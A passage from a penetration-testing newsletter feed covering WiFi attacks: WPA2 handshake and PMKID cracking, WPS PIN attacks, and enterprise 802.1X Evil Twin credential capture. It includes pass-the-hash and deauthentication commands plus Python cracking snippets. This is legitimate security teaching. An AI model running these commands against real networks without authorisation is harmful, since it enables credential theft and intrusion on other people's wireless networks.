- Check if WPS PBC is enabled

### WPA3 and Transitional Networks

- Identify WPA2/3 mixed-mode (transitional) networks
- Test downgrade attack against transitional networks
- Test Dragon Drain DoS against WPA3 APs
- Perform online dictionary attack against WPA3-SAE
- Verify MFP/PMF enforcement status
- Test DoS resilience on non-MFP networks

### Enterprise Networks (MGT / 802.1X)

- Gather EAP identities and extract username formats
- Extract AP certificate details: CN, issuer, SANs, expiration, algorithm
- Enumerate accepted EAP methods (EAP_buster)
- Check if legacy/weak methods are accepted: PAP, CHAP, EAP-MD5
- Try Evil Twin credential capture (eaphammer, hostapd-wpe)
- Capture and crack NetNTLMv1 hashes
- Capture plaintext credentials if TTLS+PAP is accepted
- Attempt PEAP relay (wpa_sycophant + berate_ap, 3 adapters)
- Test Pass-the-Hash authentication with captured NT hashes
- Verify whether clients enforce CA validation against a known CA
- Verify certificate robustness: algorithm strength, key length, chain integrity, expiration

### WIDS/WIPS Evaluation

- Identify presence of WIDS/WIPS in the environment
- Test ESSID stripping to evaluate signature-based detection
- Check whether deauth attacks trigger alerts
- Test network segmentation from the wireless segment

## 🎯 Key Takeaways

PEAP relay changes the calculus on enterprise WiFi. You&apos;re not hoping the password is in your wordlist. You forward the authentication live and walk onto the network. Three adapters, one config file, and a target that accepts `crypto_binding=0`. The only reliable defenses are enforced crypto binding and EAP-TLS.

ESSID stripping defeats the most common WIDS detection method. One invisible character. That&apos;s the difference between triggering an alert and not. It doesn&apos;t beat behavior-based detection, but it removes the easiest catch.

The checklist is your pre-flight. Each item represents a finding category. Work through it on every engagement. The most consistent enterprise WiFi findings are PEAP without CA validation, legacy EAP methods left enabled, and WPS still active on APs that should have had it disabled years ago.

---

That wraps up the WiFi series.

Four issues. Hardware and fundamentals. WPA/WPA2 cracking, PMKID, WPS, and WPA3. Enterprise credential capture, Pass-the-Hash, and EAP method exploitation. PEAP relay and ESSID stripping.

Build a lab. FreeRADIUS on a Raspberry Pi. Practice until the 802.1X flow makes sense at the frame level. These attacks work because organizations optimize for compatibility. Your job is to find where they made that trade-off.

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>wireless-security</category><author>Ruben Santos</author></item><item><title>WiFi Hacking 101: Exploiting Enterprise Networks (Part 3)</title><link>https://www.kayssel.com/newsletter/issue-38</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-38</guid><description>Breaking into 802.1X enterprise WiFi through credential capture, legacy method exploitation, and Pass-the-Hash attacks</description><pubDate>Sun, 22 Feb 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

We&apos;re continuing the WiFi series this week, moving into enterprise network exploitation. This is Part 3, based on the WiFi security course I took last month with [@OscarAkaElvis](https://twitter.com/OscarAkaElvis) (creator of [airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon)).

Parts 1 and 2 covered the fundamentals: hardware setup, monitor mode, WPA/WPA2 cracking, PMKID attacks, WPS exploitation, and WPA3 vulnerabilities. That&apos;s the home network and small business landscape.

Enterprise WiFi is different. 802.1X authentication with RADIUS servers. Individual user credentials instead of shared passwords. EAP methods like PEAP, TTLS, and TLS. Certificate-based mutual authentication.

On paper, it&apos;s significantly more secure than WPA2-PSK. In practice, it&apos;s consistently misconfigured.

The problem is compatibility. Organizations deploy PEAP+MSCHAPv2 (which leaks NetNTLMv1 hashes ready for offline cracking) because it works with Windows without additional configuration. They enable legacy authentication methods like PAP and EAP-MD5 for backwards compatibility with ancient devices. They skip certificate validation on client devices to avoid support tickets.

Every one of these decisions creates an attack vector.

This week we&apos;re covering the fundamentals of enterprise WiFi exploitation: 802.1X architecture, EAP authentication methods, reconnaissance techniques, credential capture attacks with Evil Twin, legacy method exploitation, and Pass-the-Hash.

Part 4 (next week) will cover the advanced techniques: PEAP relay attacks, ESSID stripping for WIDS bypass, and comprehensive defensive mitigations.

Let&apos;s exploit some enterprise WiFi 👇

## 🏢 Enterprise WiFi Architecture

Enterprise WiFi uses **802.1X** (IEEE standard from 2001) for network access control. Instead of a shared password like WPA2-PSK, each user authenticates with individual credentials verified against a backend RADIUS server.

**Key components:**

**Supplicant** - The client device (laptop, phone) trying to connect. Runs wpa_supplicant or Windows supplicant.

**Authenticator** - The access point. Doesn&apos;t make auth decisions, just forwards EAP frames between supplicant and RADIUS server.

**Authentication Server** - RADIUS server integrated with Active Directory or LDAP. Makes the accept/reject decision.

**Authentication flow:**

```
1. Client sends EAPOL-Start to AP
2. AP forwards EAP-Identity-Request to client
3. Client responds with identity (username@domain.com)
4. AP forwards to RADIUS server
5. RADIUS server initiates EAP method (PEAP, TTLS, TLS)
6. Client and RADIUS establish TLS tunnel
7. Inner authentication happens inside tunnel (MSCHAPv2, GTC, etc)
8. RADIUS sends Access-Accept or Access-Reject to AP
9. AP grants or denies network access
```

This architecture has a fundamental flaw: the access point blindly forwards EAP frames. It doesn&apos;t validate that the RADIUS server is legitimate. This enables **Evil Twin attacks** where an attacker presents a fake AP, and if clients don&apos;t enforce certificate validation, they connect automatically and leak credentials.

## 🔐 EAP Authentication Methods

EAP (Extensible Authentication Protocol, RFC 3748) supports multiple authentication mechanisms. Each has different security properties and attack surfaces.

### PEAP (Protected EAP)

Most common in corporate environments. Establishes a TLS tunnel between client and RADIUS server, then performs inner authentication inside the tunnel.

**PEAP+MSCHAPv2** is the standard configuration. Client sends username/password. Server responds with challenge. Client computes response using NT hash of password. This challenge/response is **NetNTLMv1**, which can be captured and cracked offline.

The TLS tunnel protects credentials from passive eavesdropping but does nothing against active Evil Twin attacks if the client doesn&apos;t validate the server certificate.

### EAP-TTLS (Tunneled TLS)

Similar to PEAP but more flexible. Supports more inner authentication methods including PAP (plaintext passwords inside tunnel), CHAP, MSCHAPv2, and EAP-based methods.

**EAP-TTLS+PAP** is dangerously common. Organizations deploy it for legacy device compatibility. If you can get a client to connect to your fake AP, you capture plaintext credentials.

### EAP-TLS

The most secure option. Mutual certificate-based authentication. Both client and server present certificates. No passwords transmitted.

If an enterprise network uses EAP-TLS exclusively with proper certificate validation, you&apos;re not capturing credentials through Evil Twin attacks. You&apos;ll need to pivot to other vectors (physical access to extract client certs, social engineering, etc).

### Legacy Methods

**PAP (Password Authentication Protocol)** - Transmits passwords in cleartext. Only acceptable inside a TLS tunnel (TTLS+PAP). If deployed without tunneling, credentials are immediately compromised.

**CHAP (Challenge-Handshake Authentication Protocol)** - Uses MD5 challenge/response. Weak cryptography, vulnerable to offline cracking.

**EAP-MD5** - Legacy EAP method with simple MD5 challenge/response. No mutual authentication. No session key derivation. Completely broken. Credentials can be captured and cracked offline.

If you discover PAP, CHAP, or EAP-MD5 enabled on an enterprise network, that&apos;s a **critical finding**.

## 🔍 Reconnaissance Phase

Before attacking, understand the target network&apos;s configuration.

### Capture EAP Identities

User identities are transmitted during EAP authentication. These follow specific formats:

- **User Principal Name**: `user@domain.com`
- **Domain\User**: `DOMAIN\username`
- **SAMAccountName**: `username`
- **Email**: `email@domain.com`
- **Anonymous**: `anonymous@domain.com`

```bash
# Start capture on target network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
```

Analyze with Wireshark:

```
eap &amp;&amp; eap.identity
```

You&apos;ll see identity formats and potentially extract valid usernames for further attacks.
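When you collect a batch of identities, sorting them by format tells you which username convention to feed into later attacks. A hypothetical classifier for the formats listed above (the regexes and labels are illustrative, not from any tool):

```python
import re

# Hypothetical classifier for common EAP identity formats
PATTERNS = [
    ("anonymous", re.compile(r"^anonymous@", re.I)),
    ("upn_or_email", re.compile(r"^[^@\\]+@[^@]+$")),
    ("domain_user", re.compile(r"^[^\\]+\\[^\\]+$")),
    ("sam_account", re.compile(r"^[^@\\]+$")),
]

def classify(identity: str) -> str:
    for name, pat in PATTERNS:
        if pat.match(identity):
            return name
    return "unknown"

for ident in ["anonymous@corp.com", "jsmith@corp.com", "CORP\\jsmith", "jsmith"]:
    print(ident, "-", classify(ident))
```

Anonymous outer identities are worth tracking separately: they hide the real username, but the realm part still leaks the domain.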

### Extract AP Certificate

The access point presents a server certificate during TLS tunnel establishment. You need certificate details to create a convincing fake AP.

**Wireshark filter:**

```
eap &amp;&amp; tls.handshake.certificate
```

Look for:
- **Subject**: Server hostname
- **Issuer**: Certificate Authority
- **Validity period**
- **Subject Alternative Names (SANs)**

The more closely your fake certificate resembles the legitimate one, the more likely clients will connect automatically (if they&apos;re not enforcing CA validation, which many aren&apos;t).

### Detect Supported EAP Methods

Once you have a valid username, test which EAP methods the RADIUS server supports.

**EAP_buster tool:**

```bash
# Clone
git clone https://github.com/blackarrowsec/EAP_buster
cd EAP_buster

# Test methods (adapter in managed mode)
bash ./EAP_buster.sh &apos;wlan0&apos; &apos;username@domain.com&apos;
```

This probes the RADIUS server with different EAP method requests. Output shows which methods are accepted (PEAP, TTLS, TLS, MD5, etc).

If you see PAP, CHAP, or EAP-MD5 accepted, prioritize those for credential capture.

## 💀 Attack 1: Credential Capture with Evil Twin

The most practical enterprise WiFi attack. Set up a fake access point that mimics the legitimate network. When clients connect, capture authentication credentials.

**Prerequisites:**
- Valid SSID
- Target channel
- Certificate details (from recon phase)
- Tool: `hostapd-wpe` or `eaphammer`

### Using eaphammer

[eaphammer](https://github.com/s0lst1c3/eaphammer) automates the entire attack workflow.

**Step 1: Create certificates**

```bash
# Clone and setup
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer

# Certificate wizard
python3 ./eaphammer --cert-wizard
```

Answer prompts with details extracted from legitimate AP certificate. The closer the match, the better.

**Step 2: Launch Evil Twin**

```bash
# Adapter must be in managed mode
# eaphammer will switch it to master mode automatically

python3 ./eaphammer -i wlan0 \
  --auth wpa-eap \
  --essid &apos;CorporateWiFi&apos; \
  --creds
```

This creates a fake AP with SSID &quot;CorporateWiFi&quot; and starts capturing credentials.

**Step 3: Deauth legitimate clients (on second adapter)**

```bash
# On second adapter in monitor mode
# Tune to target channel
sudo iw dev wlan1mon set channel 6

# Deauth attack
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF --ignore-negative-one wlan1mon
```

Clients disconnect from real AP and reconnect. If their configuration doesn&apos;t enforce proper certificate validation, they connect to your fake AP automatically.

**Step 4: Captured credentials**

eaphammer outputs captured hashes in real-time:

```
[CREDS] username: jsmith@corp.com
[CREDS] NetNTLMv1 Challenge: 5c2b6f3a7d8e9f1c
[CREDS] NetNTLMv1 Response: a7d8e9f1c2b3a4f5...
```

These NetNTLMv1 hashes can be cracked offline with Hashcat or John the Ripper.

### Using hostapd-wpe

[hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) is the alternative. More manual but works reliably.

**Configuration file** (`hostapd-wpe.conf`):

```
interface=wlan0
driver=nl80211
ssid=CorporateWiFi
channel=6
hw_mode=g

wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
auth_algs=3

ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/certs/dh
```

**EAP user file** (`hostapd.eap_user`):

```
*     PEAP,TTLS,TLS,FAST
&quot;t&quot;   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC   &quot;t&quot;   [2]
```

This accepts any username and enables all methods.

**Launch:**

```bash
sudo hostapd-wpe hostapd-wpe.conf
```

Captured hashes are logged to console and `hostapd-wpe.log`.

### Cracking NetNTLMv1 Hashes

**Hashcat (GPU-accelerated):**

```bash
# Hashcat mode 5500 for NetNTLMv1
hashcat -m 5500 -a 0 hashes.txt wordlist.txt

# With rules for better coverage
hashcat -m 5500 -a 0 hashes.txt wordlist.txt -r rules/best64.rule
```

**John the Ripper:**

```bash
john --format=netntlm-naive --wordlist=wordlist.txt hashes.txt
```

NetNTLMv1 is significantly faster to crack than NetNTLMv2. Weak passwords fall within minutes.

## 🔓 Attack 2: Legacy Method Exploitation

If the network supports PAP, CHAP, or EAP-MD5, exploitation is straightforward.

### EAP-MD5 Credential Capture

EAP-MD5 uses simple MD5 challenge/response without tunneling. Capture the exchange and crack offline.

**Capture with Wireshark:**

```
eap &amp;&amp; eap.type == 4
```

Extract:
- **Identity** (username)
- **Challenge** (MD5 challenge value)
- **Response** (MD5 response value)

**Example from pcap:**

```
Identity: jsmith
Challenge (hex): 5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091
Response (hex): a7d8e9f1c2b3a4f5c6d7e8f90a1b2c3d
```

### Cracking EAP-MD5 with eapmd5pass

```bash
# Format challenge and response with colons
CHALLENGE=$(echo &quot;5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091&quot; | sed &apos;s/\(..\)/\1:/g;s/:$//&apos;)
RESPONSE=$(echo &quot;a7d8e9f1c2b3a4f5c6d7e8f90a1b2c3d&quot; | sed &apos;s/\(..\)/\1:/g;s/:$//&apos;)

# Crack with dictionary
eapmd5pass -w wordlist.txt -E jsmith -C &quot;$CHALLENGE&quot; -R &quot;$RESPONSE&quot;
```
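Under the hood, eapmd5pass runs a plain dictionary loop over the CHAP-style MD5 computation: the response is the MD5 of the EAP identifier byte, the password, and the challenge. A minimal sketch, with an illustrative identifier, challenge, and wordlist (none of these values come from a real capture):

```python
import hashlib

def eapmd5_response(eap_id: int, password: bytes, challenge: bytes) -> bytes:
    # EAP-MD5 (CHAP-style): response = MD5(identifier byte || password || challenge)
    return hashlib.md5(bytes([eap_id]) + password + challenge).digest()

def crack(eap_id: int, challenge: bytes, response: bytes, wordlist) -> str:
    # Dictionary loop: recompute the response per candidate and compare
    for word in wordlist:
        if eapmd5_response(eap_id, word.encode(), challenge) == response:
            return word
    return ""

# Hypothetical exchange: identifier, challenge, and wordlist are illustrative
challenge = bytes.fromhex("5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091")
target = eapmd5_response(2, b"Winter2023", challenge)
print(crack(2, challenge, target, ["summer", "Winter2023", "letmein"]))  # Winter2023
```

One unsalted MD5 per guess is why EAP-MD5 falls so fast: a single GPU tests billions of candidates per second.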

### Alternative: hcxpcapngtool + Hashcat

```bash
# Convert capture to Hashcat format
hcxpcapngtool --eapmd5=eapmd5.hash capture.cap

# Crack with Hashcat mode 4800
hashcat -m 4800 -a 0 eapmd5.hash wordlist.txt
```

### TTLS+PAP Plaintext Capture

If the network supports TTLS+PAP and clients don&apos;t validate server certificates, you capture plaintext passwords.

**eaphammer captures automatically:**

```bash
python3 ./eaphammer -i wlan0 --auth wpa-eap --essid &apos;CorporateWiFi&apos; --creds
```

When a client connects using TTLS+PAP, eaphammer logs:

```
[CREDS] username: jsmith@corp.com
[CREDS] password: Summer2024!
```

No cracking needed. Direct cleartext credentials.

## 🔑 Pass-the-Hash in Enterprise WiFi

Once you&apos;ve captured NetNTLMv1 hashes, you can use them directly without cracking.

**wpa_supplicant supports NT hash authentication:**

```bash
# Generate NT hash from password (for testing)
echo -n &quot;password&quot; | iconv -t UTF16LE | openssl dgst -md4 -provider legacy
```

Output: `8846f7eaee8fb117ad06bdd830b7586c`

**Configuration file:**

```
network={
    ssid=&quot;CorporateWiFi&quot;
    key_mgmt=WPA-EAP
    eap=PEAP
    identity=&quot;jsmith@corp.com&quot;
    password=hash:8846f7eaee8fb117ad06bdd830b7586c  # NT hash
    phase1=&quot;peapver=0&quot;
    phase2=&quot;auth=MSCHAPV2&quot;
}
```

**Connect:**

```bash
wpa_supplicant -D nl80211 -i wlan0 -c corp.conf
```

You&apos;re authenticated using the hash. No need to crack the plaintext password.

This is particularly useful when you&apos;ve captured hashes but cracking is taking too long. Authenticate immediately with the hash.

## 🎯 Key Takeaways

Enterprise WiFi security depends entirely on proper configuration. 802.1X with RADIUS provides strong authentication architecture, but organizations consistently misconfigure it.

The most common failure is not enforcing certificate validation on clients. This single misconfiguration enables all Evil Twin attacks. Clients connect to fake access points automatically, leaking credentials.

PEAP+MSCHAPv2 is the most deployed enterprise method and remains vulnerable to credential capture. NetNTLMv1 hashes can be cracked offline or used directly via Pass-the-Hash.

Legacy methods (PAP, CHAP, EAP-MD5) should never be deployed. If you find them during an assessment, that&apos;s a critical finding. Credentials are either plaintext or trivially crackable.

Reconnaissance is essential. Extract EAP identities to understand username formats. Capture AP certificates to create convincing fake APs. Test supported EAP methods with EAP_buster to identify the weakest path.

eaphammer and hostapd-wpe are your primary tools. Both capture credentials automatically. eaphammer is more automated, hostapd-wpe gives you more control.

Pass-the-Hash works in enterprise WiFi. You don&apos;t always need to crack captured hashes. Use them directly in wpa_supplicant configuration.

---

That&apos;s it for Part 3!

We&apos;ve covered the fundamentals of enterprise WiFi exploitation: architecture, authentication methods, reconnaissance, credential capture, legacy method attacks, and Pass-the-Hash.

Part 4 (next week) will dive into advanced techniques: PEAP relay attacks (real-time credential relaying without cracking), ESSID stripping for WIDS bypass, comprehensive defensive mitigations, and practice lab setup.

These attacks work because organizations prioritize compatibility and ease of deployment over security. Test them on your own lab first. Set up a Raspberry Pi with FreeRADIUS and hostapd. Practice the techniques until you understand the 802.1X flow completely.

Thanks for reading, and happy hunting!

— Ruben</content:encoded><category>Newsletter</category><category>wireless-security</category><author>Ruben Santos</author></item><item><title>WiFi Hacking 101: WPA/WPA2 Cracking, PMKID, and WPS (Part 2)</title><link>https://www.kayssel.com/newsletter/issue-37</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-37</guid><description>From 4-way handshake capture to offline cracking: WPA/WPA2 attacks, PMKID exploitation, WPS vulnerabilities, and what WPA3 actually protects against</description><pubDate>Sun, 15 Feb 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Welcome back. Part 1 covered the fundamentals: hardware, monitor mode, packet injection, deauth attacks, and basic Wireshark analysis. If you haven&apos;t read it, [start there first](/newsletter/issue-35).

Now we get to the actual attacks against encrypted networks.

WPA/WPA2 is still the dominant standard in homes and small businesses worldwide. WPS is still enabled by default on millions of routers shipped today. WPA3 is the &quot;secure&quot; successor, and it has its own problems. This issue covers all of it.

Let&apos;s keep breaking WiFi 👇

## 🤝 WPA/WPA2: The 4-Way Handshake

To understand why WPA/WPA2 cracking works, you need to understand the 4-way handshake. This is the authentication sequence that runs every time a client connects to a network.

Here&apos;s what happens:

1. **AP sends ANonce** (random nonce generated by the access point)
2. **Client generates SNonce**, computes the PTK from the PMK (derived from the PSK + SSID via PBKDF2-SHA1), the ANonce, SNonce, and both MAC addresses. Sends back the SNonce with a MIC.
3. **AP derives the same PTK**, sends the Group Temporal Key (GTK) encrypted with the PTK, protected with a MIC.
4. **Client acknowledges**. Secure session established.

The critical detail is step 2. The PMK is derived from the PSK (your WiFi password) using PBKDF2-SHA1. If you capture the 4-way handshake, you have everything you need to run an offline dictionary attack. No rate limiting. No lockouts. Just you, a wordlist, and GPU time.

The security of WPA2-PSK is entirely dependent on passphrase strength.

### Capturing the Handshake

You have two options: passive or active.

**Passive capture**: Start airodump-ng targeting the network and wait. When a client connects naturally, you capture the handshake. No interaction with the AP, no detection risk.

**Active capture**: Deauth a connected client, force them to reconnect, and capture the handshake. Faster, but the deauth frames may trigger a WIDS (Wireless Intrusion Detection System).

```bash
# Step 1: Identify the target network and channel
sudo airodump-ng wlan0mon

# Step 2: Start capturing, focused on target
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Step 3 (active): Deauth a connected client to force reconnect
# Run this in a second terminal while airodump-ng is still running
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# When handshake is captured, airodump-ng shows:
# WPA handshake: AA:BB:CC:DD:EE:FF
```

Verify your capture before moving to cracking:

```bash
# Check if the capture contains a valid handshake
aircrack-ng handshake-01.cap
```

### Offline Cracking

Two main options: aircrack-ng (CPU, slow) or hashcat (GPU, fast). Use hashcat. Your GPU is 10-100x faster than your CPU for this task.

**Important**: The old hashcat mode `-m 2500` is deprecated. Modern captures use `-m 22000`, which handles both handshakes and PMKID in the same format.

```bash
# aircrack-ng (CPU, simpler)
aircrack-ng -w /path/to/wordlist.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap

# Convert capture for hashcat (requires hcxtools)
hcxpcapngtool -o hashes.hc22000 handshake-01.cap

# hashcat (GPU, recommended)
hashcat -m 22000 -a 0 hashes.hc22000 /path/to/wordlist.txt

# With rules (much more effective than raw wordlist)
hashcat -m 22000 -a 0 hashes.hc22000 /path/to/wordlist.txt -r /usr/share/hashcat/rules/best64.rule
```

Good wordlists: [rockyou.txt](https://github.com/danielmiessler/SecLists/tree/master/Passwords) as a baseline, then domain-specific wordlists from [SecLists](https://github.com/danielmiessler/SecLists). Target company names, location names, and years in your custom wordlists. Most people use variations of their company or address.

### The Evil Twin Attack

If the password resists cracking, there&apos;s another path. The Evil Twin attack sets up a fake AP with the same SSID, continuously deauths clients from the real AP, and presents a captive portal asking users to &quot;re-enter their WiFi password.&quot;

[airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) automates this entirely. It handles the fake AP setup, DHCP, DNS, captive portal hosting, and continuous DoS against the legitimate network.

The key detail: airgeddon uses the captured handshake or PMKID to validate the password the victim enters in the portal. It only reports success when the submitted password matches the real one. No false positives.

This attack is social engineering via RF. It works especially well against users who see a &quot;network update required&quot; portal and don&apos;t question it.

## 🎯 PMKID: Clientless WPA2 Cracking

In 2018, the [Hashcat](https://hashcat.net/hashcat/) team disclosed a new attack. It changed WiFi cracking fundamentally.

The PMKID is a value computed by the AP during fast roaming:

```
PMKID = HMAC-SHA1-128(PMK, &quot;PMK Name&quot; || AP_MAC || STA_MAC)
```

The PMK is derived directly from the PSK (your password) and SSID. The AP MAC and STA MAC are known. If you can extract the PMKID, you have everything needed for an offline dictionary attack.
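The offline attack is just this computation in a loop: derive a candidate PMK, compute the PMKID, compare against the captured value. A sketch with illustrative MACs, SSID, and passphrase (all hypothetical):

```python
import hashlib, hmac

def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || STA_MAC)
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def check_candidate(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes, captured: bytes) -> bool:
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    return pmkid(pmk, ap_mac, sta_mac) == captured

# Hypothetical capture: MACs, SSID, and passphrase are illustrative values
ap  = bytes.fromhex("aabbccddeeff")
sta = bytes.fromhex("112233445566")
target = pmkid(hashlib.pbkdf2_hmac("sha1", b"Summer2024!", b"CorporateWiFi", 4096, 32), ap, sta)
for guess in ["letmein", "Summer2024!", "password1"]:
    if check_candidate(guess, "CorporateWiFi", ap, sta, target):
        print("cracked:", guess)
```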

The game-changing part: **you don&apos;t need a client to be connected**.

Classic handshake capture requires waiting for (or forcing) a client to connect. PMKID extraction triggers on the AP directly by sending an authentication packet. One packet out, PMKID back.

A quick caveat: PMKID extraction is not fully passive. You send one auth packet to the AP, which triggers it to include the PMKID in its response. Most networks with vulnerable implementations respond. It doesn&apos;t require 802.11r/Fast Transition networks, despite what some guides claim. Many standard WPA/WPA2 APs expose PMKIDs regardless.

### Capturing and Cracking PMKID

[hcxdumptool](https://github.com/ZerBea/hcxdumptool) is the tool for this. The commands below are for hcxdumptool &gt;= 6.3.0.

```bash
# Step 1: Create a BPF filter to target a specific AP (optional but cleaner)
tcpdump -i wlan0mon wlan addr3 AA:BB:CC:DD:EE:FF -ddd &gt; bpf_filter.bpf

# Step 2: Capture with hcxdumptool
# -c 6a = channel 6, &apos;a&apos; = 2.4GHz band modifier
# --rds=1 = real-time status display, so you see PMKIDs/handshakes as they arrive
hcxdumptool -i wlan0mon -c 6a --rds=1 --bpf=bpf_filter.bpf -w pmkid_capture.pcapng

# Let it run for 30-60 seconds, then Ctrl+C

# Step 3: Convert to hashcat format
hcxpcapngtool -o hashes.hc22000 pmkid_capture.pcapng

# Step 4: Crack with hashcat (same mode as handshake, -m 22000)
hashcat -m 22000 -a 0 hashes.hc22000 /path/to/wordlist.txt
```

To verify your capture contains a PMKID in Wireshark, use this filter:

```
wlan.rsn.ie.data_type == 4
```

You can also do a quick sanity check with aircrack-ng:

```bash
aircrack-ng pmkid_capture.pcapng
# Should show: &quot;WPA (1 handshake, with PMKID)&quot; or similar
```

Both handshakes and PMKIDs use `-m 22000` in hashcat. hcxpcapngtool outputs both in the same file. One crack session handles everything.

The PMKID attack dramatically reduces the time needed on-site. In many assessments, you can walk past a network, trigger PMKID capture in under a minute, and crack the password at your desk later. No waiting for clients to connect. No noisy deauths.

## 🔓 WPS: Still Enabled, Still Broken

Wi-Fi Protected Setup was introduced in 2007 to make connecting devices easier. Instead of typing a complex password, users press a button or enter an 8-digit PIN.

The PIN method is broken by design. The 8-digit PIN isn&apos;t validated as a single unit. The AP validates the first four digits and second four digits separately, and the last digit is a checksum. This reduces the brute-force space from 100,000,000 combinations to approximately 11,000.

Eleven thousand guesses. On a protocol with no lockout in many implementations.
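The arithmetic behind those eleven thousand guesses, plus the checksum scheme, sketched in Python (the checksum algorithm is the one defined in the WPS specification):

```python
def wps_checksum(first7: int) -> int:
    # Checksum digit over the first 7 PIN digits, per the WPS specification
    accum, t = 0, first7
    while t:
        accum += 3 * (t % 10)
        t //= 10
        accum += t % 10
        t //= 10
    return (10 - accum % 10) % 10

def full_pin(first7: int) -> str:
    return f"{first7:07d}{wps_checksum(first7)}"

print(full_pin(1234567))   # 12345670 -- the classic default PIN
# First half (4 digits) and second half (3 digits + checksum) validated separately:
keyspace = 10**4 + 10**3   # 11000 effective guesses
print(keyspace)            # 11000
```

Note that wps_checksum(0) is also 0, so 00000000 is a well-formed PIN too, which is why all-zero defaults show up on real devices.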

### Four Ways to Attack WPS

**1. Pixie Dust**

The most devastating WPS attack. Some AP implementations generate weak random numbers for the WPS exchange (specifically E-S1 and E-S2 nonces). Pixie Dust exploits this weak randomization to recover the PIN nearly instantly, without brute-forcing anything. Works offline once you capture a single WPS exchange attempt.

```bash
# Reaver with Pixie Dust
# Note: use legacy interface names (wlan0, wlan1), not predictable interface names like wlx00c0ca9208dc
# Use -5 flag if target is on 5GHz band
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -N -vvv
```

If the chipset is vulnerable, you&apos;ll have the PIN (and therefore the WPA password) in seconds.

**2. Null PIN**

Some vendor implementations have a bug where sending an empty PIN string causes the AP to disclose the WPA password. This is a code quality failure, not a protocol flaw.

```bash
# Reaver Null PIN attempt
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -L -f -N -g 1 -d 2 -vvv -p &apos;&apos;
```

**3. Brute-Force**

Classic WPS PIN brute-force. With ~11,000 effective combinations and no lockout on vulnerable APs, this is feasible. It&apos;s slow (several hours in the worst case) but reliable against targets where Pixie Dust doesn&apos;t apply.

```bash
# Reaver brute-force
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -L -f -N -d 2 -vvv

# Bully brute-force (alternative tool)
bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -S -L -F -B -v 2
```

**4. Known PINs**

Many routers ship with default or algorithmically predictable WPS PINs. `12345670` is a default on a surprising number of devices. Tools like Reaver can check known PINs before brute-forcing.

### What to Check in an Assessment

WPS is often enabled by default and forgotten. Check every AP for WPS status:

```bash
# airodump-ng shows WPS in the output
sudo airodump-ng wlan0mon
# Look for &quot;WPS&quot; in the output columns

# Wash scans specifically for WPS-enabled networks
sudo wash -i wlan0mon
```

A note on tooling: [Bully](https://github.com/aanarchyy/bully) development has stalled. Reaver ([t6x fork](https://github.com/t6x/reaver-wps-fork-t6x)) is actively maintained. Use Reaver as your primary WPS tool.

One more note: Reaver requires legacy interface naming (wlan0, wlan1). If your system uses predictable network interface names like `wlx00c0ca9208dc`, you may need to rename the interface or configure your system for legacy names before Reaver works correctly.

## 🐉 WPA3: Better, Not Bulletproof

WPA3 launched in 2018 as the answer to WPA2&apos;s weaknesses. The core improvement is SAE (Simultaneous Authentication of Equals), based on Dragonfly key exchange.

SAE solves the fundamental WPA2 problem: **captured handshakes are useless for offline cracking**. Each session derives a unique PMK. No handshake, no offline attack. This is proper forward secrecy.

WPA3 also enables Management Frame Protection by default, which kills deauth-based attacks against WPA3-only networks.

In 2019, Mathy Vanhoef and Eyal Ronen published the [Dragonblood attacks](https://wpa3.mathyvanhoef.com/). SAE had timing and cache-based side-channel vulnerabilities that allowed partial key recovery. Downgrade attacks could force clients back to WPA2. DoS attacks could crash or overwhelm APs.

Most of these were patched through firmware updates. Modern WPA3 implementations are significantly more hardened. But two attack paths remain relevant.

### Dragon Drain: DoS Against WPA3

SAE authentication (the Dragonfly handshake) is computationally expensive. An attacker floods the AP with SAE commit messages, exhausting its processing resources. The AP slows down or becomes unavailable.

The original Dragon Drain PoC only works with Atheros chipsets. The [airgeddon Dragon Drain plugin](https://github.com/Janek79ax/dragon-drain-wpa3-airgeddon-plugin) bypasses this limitation and works with any compatible chipset.

This attack takes several minutes before the impact becomes visible. On some devices, it triggers a reboot. It&apos;s a useful DoS primitive in environments where you need to disrupt WPA3 connectivity without relying on deauth frames.

### Online Dictionary Attack Against WPA3-SAE

SAE blocks offline cracking. But it doesn&apos;t block online guessing.

You repeatedly initiate SAE authentication exchanges against the AP, trying one password per full exchange. It&apos;s painfully slow, around 50 words per second. Compared to hashcat cracking WPA2 hashes at millions of attempts per second, this is a crawl.

But it works. On weak passwords, it works.
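To put that rate in perspective, a quick back-of-the-envelope calculation against the classic rockyou list:

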